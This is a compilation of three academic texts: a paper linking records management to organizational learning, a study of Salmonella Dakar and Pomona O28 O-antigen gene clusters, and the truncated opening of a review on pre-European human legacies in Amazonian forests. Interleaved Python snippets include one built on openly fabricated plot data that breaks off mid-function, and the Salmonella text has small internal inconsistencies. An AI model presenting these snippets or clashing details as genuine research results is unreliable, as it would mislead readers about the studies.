In double-loop learning, individuals question action strategies along with their intrinsic variables. According to Argyris (2010), this type of learning is characterized as a process in which individuals perceive and explore the possibilities of the environment by accessing new information. Those individuals then compare the information that they have learned with the norms established for the operation of a given system. From that point, individuals adopt corrective actions in their organizational action strategies based on the questioning of the normative variables of organizational action. These corrective actions result in changes in the procedures, guidelines, values, and assumptions of systems and organizational strategies (Argyris, 2010). This learning model leverages the possibilities of organizational innovation, and Organizational Learning results from emergent and creative strategies that promote inventions. After these inventions are incorporated into the mental images and representations of individuals, which requires Records Management for organizational memory, they result in innovation once they are shared.
Within this context, the learning model suggested by Argyris (2010) can be associated with the model proposed by Senge (2010). Senge believes that individuals' interactions when sharing their knowledge play a role in transforming the organization into a learning organization. Members of these organizations consider the organization to be a system in which everyone's work affects the work of everyone else, i.e., a system that affects and is also affected by the environment in which it operates.
The ideas of Argyris (2010) and Senge (2010) are in agreement on the premise that organizations are not isolated systems and that they are in a continuous process of course correction. Senge (2010) correlates the learning organization itself with innovation; for such to occur, it is expected that people adopt and develop behavioral skills, which are then translated into disciplines and/or technologies. The five disciplines proposed by Senge (2010) comprise a body of theory and practice that needs to be studied, learned, and mastered to be put into action (Table 1). Although these disciplines were proposed for the field of administration, they can also be transferred to the work practice of information professionals, insofar as these professionals are constantly asked to participate in the process of Organizational Learning in the organizations where they act, from the perspective of contemporary archival practice (Rousseau; Couture, 1998).
For Senge (2010), Organizational Learning reaches its full expression when systems thinking emerges. This type of thinking refers to individuals perceiving two stages: 1) the vision of the organization as an interdependent whole, contrary to linear chains of cause and effect, and 2) the perception of the processes of change, as opposed to fragmented and isolated facts in time and space. The particular characteristic of this type of thinking resides in the effect of feedback on human actions. These actions reinforce or balance each other, evidencing the responsibility of organizational individuals for the actions that they institute and establishing the development of the cognitive skill of Organizational Learning. Such skill is associated with the recording, organization, treatment, and diffusion of knowledge within the organization and depends upon the procedures and techniques that represent these factors.
Knowledge management linked to organizational learning
Organizational knowledge can be divided into tacit (or implicit) and codified (or explicit) knowledge (Polanyi, 1958). Explicit knowledge is that which is registered by means of signs (i.e., writing, drawing, images) or incorporated into tangible forms (i.e., machinery, tools); this form of knowledge is formal and systematic. In contrast, tacit knowledge is personal and rooted in the action and commitment of the individual (i.e., occupation or profession), as well as in technical skills, mental models, beliefs, and perspectives (Santos, 2007; Takeuchi; Nonaka, 2008).
It is inferred that organizations depend on individuals' tacit knowledge; therefore, tacit knowledge should be codified and registered. Records are documented, and these "Govern the relationships between governments, organizations, and persons" (Rousseau; Couture, 1998, p.32, our translation) 5 . This provides a competitive advantage for organizations that can properly manage their knowledge.
The adoption of a Knowledge Management policy favors Organizational Learning, which can therefore be considered one of the guidelines for Knowledge Management itself. Whatever the position adopted, some authors state that management "[...] is the process that directs individuals' competences and energies and uses material resources to reach a certain objective. [...] is also a set of techniques that allow one to make rational decisions and put them into practice so that all the individual's resources are used as best as possible bearing in mind the individual's efficacy" (Guinchat; Menou, 1994, p.443, our translation)6 . Thus, managing knowledge "[...] includes activities related to the acquisition, use and sharing of knowledge by the organization. This is an important part of the innovation process. Many studies about knowledge management practices have been done in recent years. They cover policies and strategies, leadership, knowledge acquisition, trainings and communications, as well as the reasons for the use of knowledge management practices and the motives that support the development of these practices" (Financiadora de Estudos e Projetos, 2005, p.32, our translation, emphasis added)7 .
The five disciplines (Table 1) are:
Systems thinking: the capacity to perceive that interrelated actions make up the whole (i.e., to understand that everything is interlinked and that organizations are complex systems).
Personal mastery: the ability to clarify and deepen personal visions, focus energies, develop patience, and view reality objectively and permanently (i.e., to have an open mind to reality and life with a creative and non-reactive attitude).
Mental models: deeply ingrained ideas, assumptions, and generalizations that influence how people understand the world and their relationships (i.e., these are reflected in the principles and values of the organization).
Team learning: the ability of team members to set aside their views and preconceptions to enable collective thinking; this is founded in dialogue.
Shared vision: the (co)creation of a vision shared by all of the members of the organization.
For Arantes (1998, p.88, our translation), management systems help to "Define the reason"8 of the organization; to plan, lead, organize, execute, monitor, and evaluate activities; and "To establish understanding and relationships among people; to obtain information to operate and manage the enterprise, to mobilize people to perform the organizational task"9 . Management systems potentiate the transformation of information into knowledge as long as people create meaning for this information and incorporate it in their practices (Choo, 2003). "[...] the introduction of documental information, that is, of information that is recorded in a support through the aid of a preestablished code created a real revolution in the way of seeing and using information" (Rousseau; Couture, 1998, p.61, our translation)10 .
According to the definition proposed by Santos (2007, p.176, our translation), Records Management corresponds "To the set of technical procedures and operations"11 regarding "The production, process, use, assessment, and filing of a document in a current and intermediate phase, aiming at its elimination or filing"12 . Furthermore, Records Management is responsible for the monitoring and systematic assessment of "Document creation, reception, maintenance, use, and fate, including processes to capture and preserve the evidence of information about recorded activities and transactions" (Santos, 2007, p.190, our translation)13 . Within this context, Knowledge Management can be conceived as "[...] the systematic process of identifying [recording], creating, renovating, and applying the knowledge that is strategic to the life of an organization" (Santos, 2007, p.191, our translation, emphasis added)14 .
In Knowledge Management, the focus is to some extent turned toward the results of the learning process (Loermans, 2002). However, these results are tied to the efficacy of Records Management in organizations. Records Management makes it possible for organizations to create knowledge, disseminate it, and incorporate it into products, services, and systems, thereby promoting the Organizational Learning that spurs organizational innovations.
The correlation between Knowledge Management and Records Management depends upon Information Management, which can be conceived of as a catalyzing process based on an organizational infrastructure (i.e., processes, people, and technological resources). The adoption of this management system (Figure 1) includes the stimulus for creating individual knowledge and learning as well as the systematic coordination of efforts at several levels (organizational and individual, institutional and operational, and formal and informal norms), with repercussions for satisfaction, wellbeing, and overall quality (Terra, 2001). The systemic praxis of information flow makes it possible for organizational leadership to minimize communication barriers, bringing data and information to the diverse individuals within intra- and inter-organizational networks (Cunha, 2012). Such praxis, associated with Information and Communication Technologies and with procedures for representing knowledge, constitutes an advanced management technique.
It has been highlighted that Information and Communication Technologies are a strong ally in constructing a learning organization, as long as these technologies are linked to the processes for representing knowledge. In turn, these processes are focused on the "Notational or conceptual symbolization of human knowledge"15 and bring together techniques of classification and indexing and the set of "Informational and linguistic"16 artifacts (Cunha; Cavalcanti, 2008, p.322, our translation).
According to Vasconcelos and Mascarenhas (2007), structuring the information flow by means of Information and Communication Technologies makes it possible to "horizontalize" the organization, thereby diminishing or eliminating the intermediate levels that previously made the flow of organizational knowledge rigid. Such technologies make it possible to create an organizational memory with the ability to capture, store, and recover general and specific knowledge about organizational actions, which consequently favors Organizational Learning and innovation.
Information and Communication Technologies are recognized as fundamental computational supports for the management system that comprises Records Management and Information Management and that builds Knowledge Management. Therefore, irrespective of computational support, the competitiveness of an organization depends on organizational sharing and memory, which are verticalized by the processes that range from Records Management to Knowledge Management.
Conclusion
The main source of productivity in the twenty-first century is the capacity of organizations to (trans)form knowledge into socioeconomic assets, thereby paving the way for competitive advantages. Organizations are not isolated systems; instead, they are components of numerous and varied systems that are integrated and dependent upon their composite parts: the individuals. Considering that knowledge is intrinsic to individuals, this knowledge must be represented, made explicit, and shared in order to make Organizational Learning feasible; this notion highlights the link between Records Management and Organizational Learning and consequently promotes innovation. Furthermore, Records Management supports organizational memory, which, in turn, is one of the foundational elements of Knowledge Management.
As discussed above, Knowledge Management consists of a set of guidelines, policies, strategies, practices, and tools to promote the generation, processing, and transformation of information into knowledge. This set requires skills that promote Organizational Learning and the recording of knowledge, which are linked to effective Records Management. Through Organizational Learning, the organization demonstrates its collective competence and intelligence in responding to its internal and external environment. Thus, the challenge for organizations is to identify and apply management models with the goal of promoting conditions for the creation and use of knowledge and transforming these into innovations (e.g., products, services, management, and business). Current management models presuppose systems that will assure organizational competitiveness and efficiency. Moreover, these systems frequently include the representation of individuals' tacit knowledge and the socialization of such knowledge with the goal of creating the groundwork for a critical assessment of failures and errors.
Wherever archival Records Management exists, individuals find resources to correct errors and also to reflect on their underlying values, principles, and guidelines. This situation establishes double-loop learning, which requires the ability to understand the organization systemically and within its socioeconomic context. This process is facilitated when data and information are organized and preserved within the scope of current archival science. Thus, it can be inferred that there is a close correlation between the conduct of the archivist and the processes of Knowledge Management and Organizational Learning that create the groundwork for innovation.
When archivists know that their work contributes directly to Knowledge Management and Organizational Learning, they become key professionals in innovation processes. With its roots in the process of knowledge representation, archival Records Management becomes an advanced management technique that contributes directly to Organizational Learning and to an organization's ability to innovate.
Figure 1. Relationship between data, Records Management, Information Management, and Knowledge Management.
Table 1. The five disciplines proposed by Senge. | 2019-04-13T13:12:32.349Z | 2013-07-27T00:00:00.000 | {
"year": 2013,
"sha1": "b35ac5abf831ee6f413429959600597952965174",
"oa_license": "CCBY",
"oa_url": "https://www.scielo.br/j/tinf/a/Nyhs5LLRL4R8V9BDvz77p3F/?format=pdf&lang=en",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "4b35d44a09ad7877c82875d0e8ebfd5a66b26f91",
"s2fieldsofstudy": [
"Business"
],
"extfieldsofstudy": [
"Engineering",
"Business"
]
} |
18596829 | pes2o/s2orc | v3-fos-license | The O28 Antigen Gene Clusters of Salmonella enterica subsp. enterica Serovar Dakar and Serovar Pomona Are Different
A 10 kb O-antigen gene cluster was sequenced from a Salmonella enterica subsp. enterica Dakar O28 reference strain and from two S. Pomona serogroup O28 isolates. The two S. Pomona O antigen gene clusters showed only moderate identity with the S. Dakar O28 gene cluster, suggesting that the O antigen oligosaccharides may contain one or more sugars conferring the O28 epitope but may otherwise be different. These novel findings are absolutely critical for the correct interpretation of molecular serotyping assays targeting genes within the O antigen gene clusters of these Salmonella serotypes and suggest the possibility that the O antigen gene clusters of other Salmonella serovars may also be heterogenous.
Introduction
Salmonella O serotyping utilizes antibodies specific for sugars in the lipopolysaccharide O antigen side chain to differentiate among serovars of this bacterium. Antibodies, in highly absorbed serotyping reagents, frequently recognize a very small epitope within the O antigen oligosaccharide, perhaps only one sugar or part of one sugar [1]. The O antigen of Gram-negative bacteria is a highly variable, surface-exposed component of the lipopolysaccharide which contributes a significant role to the cell surface antigenic variation of these bacteria. It consists of repeated 3-6 monosaccharide units, with the variation in O antigens due to differences in the composition of the monosaccharide units and sugar linkages. Variations among O antigens provide the structural basis for both the Salmonella Kauffmann-White [1] and Escherichia coli O antigen serotyping schemes [2]. There are currently 46 O antigens recognized in the 2541 serovars comprising Salmonella [3] and 174 types of O antigen in E. coli [4].
Serotype currently provides the baseline from which other typing methods are carried out [5,6]. Both the virulence and host range of Salmonella enterica isolates are serotype specific [7,8]; thus, accurate determination of Salmonella serotype is currently essential for human disease surveillance and outbreak detection [9] and for control of the organism in the food chain [10]. Additionally, the serogroup classification as defined by the Kauffmann-White scheme often reflects genetic relatedness, indicating that serotype frequently has phylogenetic significance [11].
The complexity, cost, and time required for traditional serotyping using custom or commercial antisera have led researchers to consider development of alternative molecular methods [12]. Consequently, it is necessary to develop techniques [13] that will allow the rapid and inexpensive determination of the most common Salmonella serotypes. Such methods [14,15] can be incorporated into easy-to-use formats [8,13,16] that will be acceptable to primary laboratories. The genes required for synthesis of the O antigen in S. enterica strains are found in a cluster between the galF and gnd genes on the bacterial chromosome [17]. Protein products of the genes within these clusters can be generally divided into three groups: (i) those required for the synthesis of the sugars, (ii) those involved in the transfer and modification of the O units, and (iii) those necessary for the polymerization and transport of the O units [17]. While the sugar biosynthetic genes have been found to be quite homogeneous between S. enterica strains, the transferase/flippase and polymerization genes encoded by the wzx and wzy genes show a great deal of heterogeneity. This heterogeneity can be used as the basis for the development of novel molecular serotyping methods [16]. We therefore sequenced and compared the O antigen gene clusters of S. Dakar and S. Pomona serogroup O28 strains.
Salmonella Isolates
Salmonella enterica subsp. enterica serotype Pomona (serotype 28 1 28 2 :y:7; NML number 07-0213) was from the strain collection of the OIE Salmonella Reference Laboratory at the Laboratory for Foodborne Zoonoses, Guelph, ON. The S. Pomona reference strain S-1467 (28 1 28 2 :y:1,7) and S. Dakar strain S-1097 (28 1 , 28 3 :a:1,6) were from the Enterics reference strain collection at the National Microbiology Laboratory (NML), Winnipeg, MB. Strain S-1467 was originally obtained from the Institut Pasteur in 1999, while S-1097 is a culture type strain obtained in 1972 from the Public Health Laboratory Service in Colindale, UK (their strain number JT 987).
Amplification of the O-Antigen Gene Cluster
The O-antigen gene cluster between the JUMPStart sequence [18] and gnd from isolate 07-0213 was amplified by long-range PCR using primers 412 and 482 [19] with an Expand Long Range dNTPack kit (Roche Diagnostics, Laval, QC, Canada), following the manufacturer's methods. Template DNA was prepared using the protocol of [20]. The amount of DMSO used in each PCR reaction was optimized to 5% (vol/vol). The amplification conditions were 92 °C for 2 minutes; 10 cycles of 92 °C for 10 seconds, 65 °C for 15 seconds, and 68 °C for 15 minutes; 20 cycles of 92 °C for 10 seconds, 65 °C for 15 seconds, and 68 °C for 15 minutes plus 20 seconds added for each additional cycle; and a final extension at 68 °C for 7 minutes. Following PCR amplification, amplicons were visualized on 1% agarose (Invitrogen Canada, Burlington, ON, Canada) gels after staining with ethidium bromide.
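The incremental 20 s extension makes the total run time of this program less obvious than for a fixed-cycle protocol. The Python sketch below is a hypothetical helper, not part of the published methods; it also assumes the auto-extension starts from the second of the 20 cycles, since the protocol wording is ambiguous on that point.

# Hypothetical helper: total programmed time of the long-range PCR run above.
def long_pcr_runtime_min() -> float:
    t = 2 * 60                              # 92 C initial denaturation, seconds
    t += 10 * (10 + 15 + 15 * 60)           # 10 fixed cycles
    for i in range(20):                     # 20 auto-extension cycles
        t += 10 + 15 + (15 * 60 + 20 * i)   # elongation grows by 20 s per cycle
    t += 7 * 60                             # 68 C final extension
    return t / 60.0

print(f"~{long_pcr_runtime_min():.0f} min")  # about 535 min (~9 h), ignoring ramp times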
Cloning of the O-Antigen Gene Cluster DNA.
Amplicons from several PCR reactions were pooled and sheared in a nebulizer (Invitrogen) for 3 minutes at 20 psi to obtain fragments between 0.5 and 4 kb. The pooled fragments were purified using Montage PCR Centrifugal Filter Devices (Millipore, Billerica, MA, USA) and cloned into the pCR4-TOPO vector using the TOPO TA Cloning kit as instructed by the manufacturer (Invitrogen). Transformants of E. coli strain DH5α were selected on Luria-Bertani agar plates containing 100 μg mL −1 ampicillin with added X-Gal-IPTG (40 μg mL −1 ; USB Corporation, Cleveland, OH, USA). DNA was isolated from positive (white) clones by the boiling technique [21].
Sequencing of the O-Antigen Cluster DNA
The Salmonella DNA inserts were amplified in PCR reactions using the FastStart Taq DNA polymerase kit (Roche Diagnostics, Laval, QC, Canada) with primers M13 (5′-GTAAAACGACGGCCAGT-3′) and T7 (5′-GTAATACGACTCACTATAG-3′), complementary to specific plasmid sequences flanking the insertion site. Amplification conditions were 94 °C for 5 minutes; 35 cycles of 94 °C for 30 seconds, 50 °C for 30 seconds, and 72 °C for 45 seconds; followed by a final extension at 72 °C for 5 minutes. Amplicons were visualized on agarose gels as above, purified by the DNA Core Facility at the National Microbiology Laboratory using the Agencourt AMPure PCR purification system (Agencourt Bioscience Corp., Beverly, MA, USA), and sequenced using the M13 and T7 primers. DNA sequencing was performed by the DNA Core Facility at the National Microbiology Laboratory using BigDye Terminator 3.1 Cycle Sequencing kits (Applied Biosystems, Foster City, CA, USA) according to the manufacturer's instructions. DNA sequence data were generated using either an ABI 3100 or 3730 DNA Analyzer (Applied Biosystems). Lasergene DNASTAR software (DNASTAR Inc., Madison, WI, USA), Kodon (Applied Maths, Austin, TX), and PSI-BLAST (http://www.ncbi.nlm.nih.gov/blast/Blast.cgi) were used for editing, assembling, and annotating the DNA sequences.
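As one hedged illustration of the annotation step, the Python sketch below (using Biopython, which the paper does not mention employing) pulls candidate open reading frames from an assembled cluster sequence; each candidate protein could then be compared against the databases with PSI-BLAST as described above.

# Illustrative ORF scan of an assembled O-antigen cluster sequence.
from Bio.Seq import Seq

def find_orfs(dna: str, min_aa: int = 100) -> list[tuple[int, int, int, str]]:
    """Return (start, end, strand, protein) for ORFs of at least min_aa
    residues. Coordinates are 0-based on the scanned strand (for strand -1
    they refer to the reverse complement); `end` excludes the stop codon."""
    seq = Seq(dna.upper())
    hits = []
    for strand, s in ((1, seq), (-1, seq.reverse_complement())):
        for frame in range(3):
            trimmed = s[frame:frame + 3 * ((len(s) - frame) // 3)]
            prot = str(trimmed.translate())
            aa_pos = 0
            for piece in prot.split("*"):          # segments between stops
                m = piece.find("M")                # first possible start codon
                if m != -1 and len(piece) - m >= min_aa:
                    start = frame + 3 * (aa_pos + m)
                    end = frame + 3 * (aa_pos + len(piece))
                    hits.append((start, end, strand, piece[m:]))
                aa_pos += len(piece) + 1           # +1 for the stop codon
    return hits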
Results
Long-range PCR amplification of DNA from S. Dakar strain S-1097 using the JUMPStart and gnd primers produced a product of 11,386 bp (Table 1). The S. Pomona O28 isolate 07-0213 O antigen gene cluster was 10,125 bp long and contained 11 open reading frames (Table 2). The sequence of this region from the S. Pomona reference strain S-1467 was also determined and found to be identical to the 07-0213 sequence from nucleotides 50-10,010 (data not shown). All O antigen cluster ORFs had low %G + C content and significant homology to genes from several other bacteria (Tables 1 and 2, Figure 1).
The gene order of the S. Dakar O28 O antigen gene cluster was very different from that of S. Pomona O28. The wzx and wzy genes were identified on the basis of homology of the translated proteins with other genes (Tables 1 and 2, Figure 1). The topology of the translated protein products of these genes was determined to ensure that it was consistent with the proposed designation. The predicted transmembrane structure of Wzx and Wzy was confirmed using the TMHMM Server v. 2.0 (http://www.cbs.dtu.dk/services/TMHMM) and the HMMTOP (http://www.enzim.hu/hmmtop/) servers, with the wzx translation product having 12 predicted membrane-spanning regions and the wzy translation products having 10. Both the wzx and wzy genes of S. Dakar O28 were unique and very different from the wzx and wzy genes of S. Pomona; the proteins showed only 28% identity (Figure 1). The S. Pomona Wzx and Wzy proteins had strong identity with their homologs in E. coli 101-1 and lower identity with Wzx and Wzy from E. coli O114 (Table 2, Figure 1). In both cases there was no identity at the DNA level, indicating convergent evolution of the proteins without transfer of genes between either E. coli strain and S. Pomona.
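A small Python sketch of the topology check follows. It assumes TMHMM's plain-text "long" output, in which each predicted segment appears as a line of the form "<sequence id>  TMHMM2.0  TMhelix  <start>  <end>"; counting the TMhelix rows per protein would reproduce the 12- and 10-helix tallies quoted above if the predictions match.

from collections import Counter

def count_tm_helices(tmhmm_long_output: str) -> Counter:
    """Count predicted transmembrane helices per sequence id."""
    counts: Counter = Counter()
    for line in tmhmm_long_output.splitlines():
        if line.startswith("#") or not line.strip():
            continue                      # skip comment and blank lines
        fields = line.split()
        if len(fields) >= 3 and fields[2] == "TMhelix":
            counts[fields[0]] += 1        # one predicted membrane-spanning helix
    return counts

# e.g. count_tm_helices(open("wzx_wzy.tmhmm").read())
# might yield Counter({"Wzx": 12, "Wzy": 10}) if the predictions agree.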
Serotyping of the Salmonella and E. coli strains was performed by bacterial agglutination assays at the Identification and Serotyping Section, National Microbiology Laboratory, using Salmonella- and E. coli-specific rabbit antisera. These antisera were prepared, absorbed where necessary, and subjected to stringent quality control by the NML according to reference methods [1,3,24]. Salmonella O antigens were determined by slide agglutination, whereas Salmonella H antigens and E. coli O and H antigens were determined by tube agglutination.
Discussion
The DNA sequence of the S. Dakar O antigen gene cluster is consistent with the known structure of its O antigen oligosaccharide (Figure 2). Rhamnose is produced by the rmlA, B, C, and D gene cluster [17], and the O antigen oligosaccharide of S. Dakar contains rhamnose (Figure 2). A putative rhamnosyltransferase was also identified in the S. Dakar O antigen gene cluster (orf11 in Table 1). Though rmlB and rmlA were present in both S. Pomona and S. Dakar, they were closest in homology to proteins from different sources (compare Tables 1 and 2), suggesting that they may have been acquired from different sources. The S. Pomona O28 O antigen cluster did not contain the rmlC and rmlD genes necessary for production of rhamnose (Figure 1, Table 2). Furthermore, none of the other genes that were present would be expected to be active in the synthesis of this 6-deoxy-hexose [17]. This differential production of rhamnose must be confirmed by structural studies of the S. Pomona O antigen oligosaccharide. If true, it could contribute to the known heterogeneity of O28 antigens. Salmonella serogroup O28 was originally divided into three subfactors (O28 1 , O28 2 , and O28 3 ) without structural differences being ascribed [22,25,26]. S. Dakar expresses subfactors O28 1 and O28 3 , whereas subfactors O28 1 and O28 2 are present in the LPS of S. Tel-Aviv and S. Pomona. The fdtA (dTDP-6-deoxy-3,4-keto-hexulose isomerase) and fdtB (dTDP-6-deoxy-D-xylo-hex-3-ulose aminase) genes were identified in both S. Pomona and S. Dakar. A homolog of the fdtC (putative acetylase) gene was identified in S. Pomona, which analysis suggested encodes a WcxM-like protein. We suggest that the gene was indeed fdtC based on two pieces of evidence: (1) a fdtC gene is present at the same location in the E. coli O114 O antigen gene cluster, and (2) fdtA, fdtB, and fdtC together comprise a functional unit [17]. A putative gene (orf12 in Table 2), also encoding a WcxM-like protein, was found in the S. Dakar O antigen gene cluster. This gene would appear to be a homolog of the fdtC gene of S. Pomona and E. coli O114. Since the S. Dakar fdtC homolog is present in the reverse orientation compared with the other genes of the O antigen cluster, it was presumably acquired independently of these other genes. Its position at the end of the gene cluster differs markedly from the position of fdtC in S. Pomona (Figure 1).
The rmlA and rmlB genes encode the first two enzymes of the rhamnose biosynthetic pathway in Salmonella and E. coli [17,19]. Beginning with glucose-1-phosphate, these two genes produce dTDP-6-deoxy-D-xylo-4-hexulose. This intermediate can then be converted to 3-acetamido-3,6-dideoxy-D-galactose by the fdtA, fdtB, and fdtC genes [17]. The fdtC gene was a homolog of wxcM genes, which encode bifunctional enzymes in which the amino-terminal part of the protein is homologous to acetyltransferases and the carboxy-terminal portion is similar to isomerases responsible for isomerization of 4-keto hexoses to 3-keto hexoses. If both activities are indeed functional in the S. Pomona FdtC protein, this protein could be responsible for the production of the Quip3NAc sugar (Figure 2; [17]) that is known to be present in the S. Dakar O28 O antigen [22], further suggesting that the sugar may be present in S. Pomona. Alternatively, S. Pomona may indeed incorporate 3-amino-3,6-dideoxy-D-galactose into its O antigen oligosaccharide. Structural determinations are required to resolve this question. E. coli O114 strain E2808 contains in its O antigen a sugar very closely related to Quip3NAc, namely 3,6-dideoxy-3-(N-acetyl-L-seryl)-aminoglucose [23]. The precursor of this sugar is likely the product of those genes homologous to the S. Pomona O28 genes that, as we suggest, may be implicated in 3-amino-3,6-dideoxy-D-galactose and/or Quip3NAc synthesis.
S. Dakar orf9 (Table 2) putatively encodes a protein with very low homology to members of the glycosylase 2 family that was not found in S. Pomona. This strongly suggests that the oligosaccharide produced by S. Dakar will differ from that produced by S. Pomona. The product of the fourth open reading frame (orf2.9) was also a putative glycosyltransferase [19]. Together, these proteins would likely be responsible for adding two or more of the remaining three sugars to the S. Dakar O28 O antigen oligosaccharide (Figure 2). The S. Pomona ORFs annotated here as wbuM and amsE also had strong homology with proteins belonging to the glycosyltransferase 2 family, though the specific function of these transferases cannot be inferred from DNA sequence alone [17]. There was no significant identity at either the DNA or protein level between these glycosyltransferases of S. Dakar and S. Pomona, suggesting that the O antigen oligosaccharides of these two isolates may contain further differences.
The protein encoded by the ORF designated wbuO contained no known conserved domains, and the function of the E. coli homolog has not been determined. Two other homologs (ACK44395 and ACD75797), which contain eight transmembrane domains, are designated as O-antigen acyltransferases.
Overall, the S. Pomona O28 O antigen gene cluster showed remarkable conservation of gene order with the O antigen gene clusters from E. coli 101-1 and E. coli O114:H32 type strain G1088 (Figure 1, [27]). No structural analysis of the E. coli 101-1 O antigen polysaccharide was found. The E. coli O114 O-antigen oligosaccharide (Figure 2) consists of equimolar amounts of galactose, ribose, N-acetylglucosamine, and 3,6-dideoxy-3-aminoglucose [23]. This is consistent with a role for the conserved wbuM, -N, and -O genes in the transfer of galactose and glucose (or N-acetylglucosamine) to the O-antigen oligosaccharide, and a role for the genes unique to E. coli O114 in the transfer of ribose. Ribose would therefore not be expected to be part of the S. Pomona O28 O antigen oligosaccharide. An additional gene (wbuL) was present in the E. coli O114 strain immediately downstream of the fdtC gene but was absent in S. Pomona. The final gene in the S. Pomona O antigen cluster showed higher homology with wbeD from E. coli O117 [28] than with the wbuP gene from E. coli O114.
The wbuL and wbuP genes of E. coli O114 are both glycosyltransferases that have no homolog in S. Pomona O28; these two genes may alter the E. coli O antigen structure in a fashion that either does not allow it to be recognized by antiserum against the Salmonella O28 serogroup or creates an alternative immunodominant epitope. This view is supported by the low homology of the wzy gene from S. Pomona O28 with the wzy gene from E. coli O114 and by the fact that the S. Pomona wzx gene was most closely homologous to a gene from Geobacter metallireducens GS-15.
The S. Pomona O antigen cluster could have been assembled using the wbuM, wbuN, and wbuO genes, at least, from E. coli O114 and other genes from a variety of different sources. E. coli O103 isolate H515b (GenBank accession numbers AY532664 and EF027106) has in its O antigen gene cluster homologs of the S. Pomona O28 rmlB, rmlA, fdtA (wbtA), fdtC (wbtB), and fdtB (wbtC) genes in the same order preceding wzx [29]. E. coli H515b strain, or a similar serogroup O103 E. coli, could also have been the source of the first five genes of the S. Pomona O28 O antigen gene cluster.
Information provided through sequencing of the S. Pomona and S. Dakar O-antigen gene clusters will allow probes for the various O28 wzx and wzy genes to be included in updated versions of DNA microarray-based Salmonella serotyping assays, as well as in assays comprising other formats [30]. This will make accurate serotyping more accessible for primary laboratories within the health care system. Differences in both the O antigen gene organization and content, as well as in the wzx and wzy gene sequences, suggest that the O antigen oligosaccharides of S. Dakar and S. Pomona may each have a different chemical structure but that both fortuitously contain the dominant O28 epitope. This needs confirmation in structural studies that are beyond the scope of the current investigations. Whether this situation occurs in any other serogroup is not known. It is clear that the development of molecular serotyping methods and the interpretation of results from these methods will require characterization of the relevant genes from each Salmonella serotype. Furthermore, the data presented here reinforce the observation that two isolates with the same serogroup may not, in fact, have the same gene content. Interpretation of the meaning of serovar identity and its relationship with virulence and host restriction or adaptation then becomes somewhat more problematic. For some purposes it may be of greater advantage to determine the genovar [11] of an isolate. | 2016-05-04T20:20:58.661Z | 2010-06-28T00:00:00.000 | {
"year": 2010,
"sha1": "f96f4a78ba1ddd6b0f5a2880a2c21fda58cce97b",
"oa_license": "CCBY",
"oa_url": "https://downloads.hindawi.com/journals/ijmicro/2010/209291.pdf",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "ba25ca94fce9ab825f3a332389926894480cb341",
"s2fieldsofstudy": [
"Biology"
],
"extfieldsofstudy": [
"Biology",
"Medicine"
]
} |
221200992 | pes2o/s2orc | v3-fos-license | Ecological legacies of past human activities in Amazonian forests
Summary In Amazonia, human activities that occurred hundreds of years ago in the pre‐European era can leave long‐lasting effects on the forests – termed ecological legacies. These legacies include the intentional or nonintentional enrichment or depletion of certain species. The persistence of these legacies through time varies by species, and creates complex long‐term trajectories of post‐disturbance succession that affect ecosystem processes for hundreds of years. Most of our knowledge of Amazonian biodiversity and carbon storage comes from a series of several hundred forest plots, and we only know the disturbance history of four of them. More empirical data are needed to determine the degree to which past human activities and their ecological legacies affect our current understanding of Amazonian forest ecology.
I. Introduction
The importance of Amazonian rainforests for an array of ecosystem services and functions is well known amongst scientists but perhaps less so amongst policymakers (Levis et al., 2020). The biodiversity of Amazonian forests is immense (ter Steege et al., 2020), but the mechanisms driving the relative abundances and distributions of this diversity remain largely unresolved. Environmental gradients, biotic interactions and dispersal limitation all play a role in structuring diversity patterns in Amazonian forests (e.g. Wright, 2005). An emerging hypothesis is that past disturbances in the landscape, particularly those caused by human activities, have also played a role in shaping the structure, function and diversity patterns observed in modern forests (McMichael et al., 2017b).
People have lived in Amazonia for over 10 000 yr (Roosevelt, 2013) and have cultivated maize in some regions for over 6000 yr (Brugger et al., 2016). Besides cultivation, people in the pre-European era also used fire to clear forests and amend soils, and they domesticated several plant species (e.g. Neves & Petersen, 2006; Piperno, 2011; Clement et al., 2015). Some of these forests have been managed continually by indigenous people for hundreds or even thousands of years, sometimes termed intensive or opportunistic agroforestry (Neves, 2013; Levis et al., 2018). But many areas that were cleared and managed at the time of European arrival c. 500 years ago were abandoned, when a majority of indigenous populations collapsed (Denevan, 2014). Following European colonization, many Jesuit missions were established but were quickly abandoned (Reeve, 1993). The 'Amazonian rubber boom' (c. AD 1850-1920) was a subsequent influx of European colonists that later collapsed because establishing rubber plantations was cheaper in Malaysia (Hecht, 2013). It is likely that all of these past waves of colonization and abandonment in Amazonia left ecological legacies in the forests.

Ecological legacy refers to the influence of an event (i.e. disturbance) on an ecosystem and its persistence over a given time period, and is a term that has been widely used in succession studies. The type and intensity of human disturbance (e.g. clear cut versus forest burning) affect the trajectory of the ecological legacy in Amazonian systems on decadal timescales (e.g. Mesquita et al., 2015). The long-term ecological legacies of past human impacts during the pre- and post-European eras, however, remain more obscure. Here I review recent advances in our understanding of long-term ecological legacies in Amazonia with a focus on biodiversity and carbon storage, and highlight why assessing past disturbances is crucial for understanding the patterns and dynamics observed in these globally important forests.
II. Ecological legacies on forest composition
Most studies of ecological legacies on Amazonian forest composition have focused on the enrichment and long-term persistence of useful species. It has been suggested that Bertholletia excelsa (Brazil nut), Bactris gasipaes (peach palm) and other edible plants were enriched in the pre-European era, and their abundances have remained artificially high ever since (i.e. for hundreds of years) (Fig. 1a; Scoles & Gribel, 2011; Clement et al., 2015; Thomas et al., 2015; Maezumi et al., 2018). In a series of c. 1100 forest plots in Amazonia, there was higher richness and abundance of domesticated tree species in locations that were closest to known pre-European archaeological sites. Many of these same domesticated species that show a relationship with pre-European occupation are also some of the most abundant across the basin (ter Steege et al., 2013).
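The kind of pattern reported for those plots can be illustrated with a toy analysis. The Python sketch below fabricates plot data in which domesticate richness declines with distance to the nearest archaeological site, and tests the association with a hand-rolled Spearman correlation; the numbers, variable names, and the simplistic tie handling are all illustrative assumptions, not anything from the cited studies.

```python
import random
random.seed(1)

# Fabricated example: 20 plots, distance (km) to the nearest known
# archaeological site, and a noisy, declining count of domesticates.
plots = []
for d in range(0, 60, 3):
    richness = max(0, round(12 - 0.15 * d + random.gauss(0, 1.5)))
    plots.append((d, richness))

def spearman(xs, ys):
    # Rank-based correlation; ties get an arbitrary order here, which
    # is fine for a rough illustration but not for a real analysis.
    def ranks(v):
        order = sorted(range(len(v)), key=lambda i: v[i])
        r = [0.0] * len(v)
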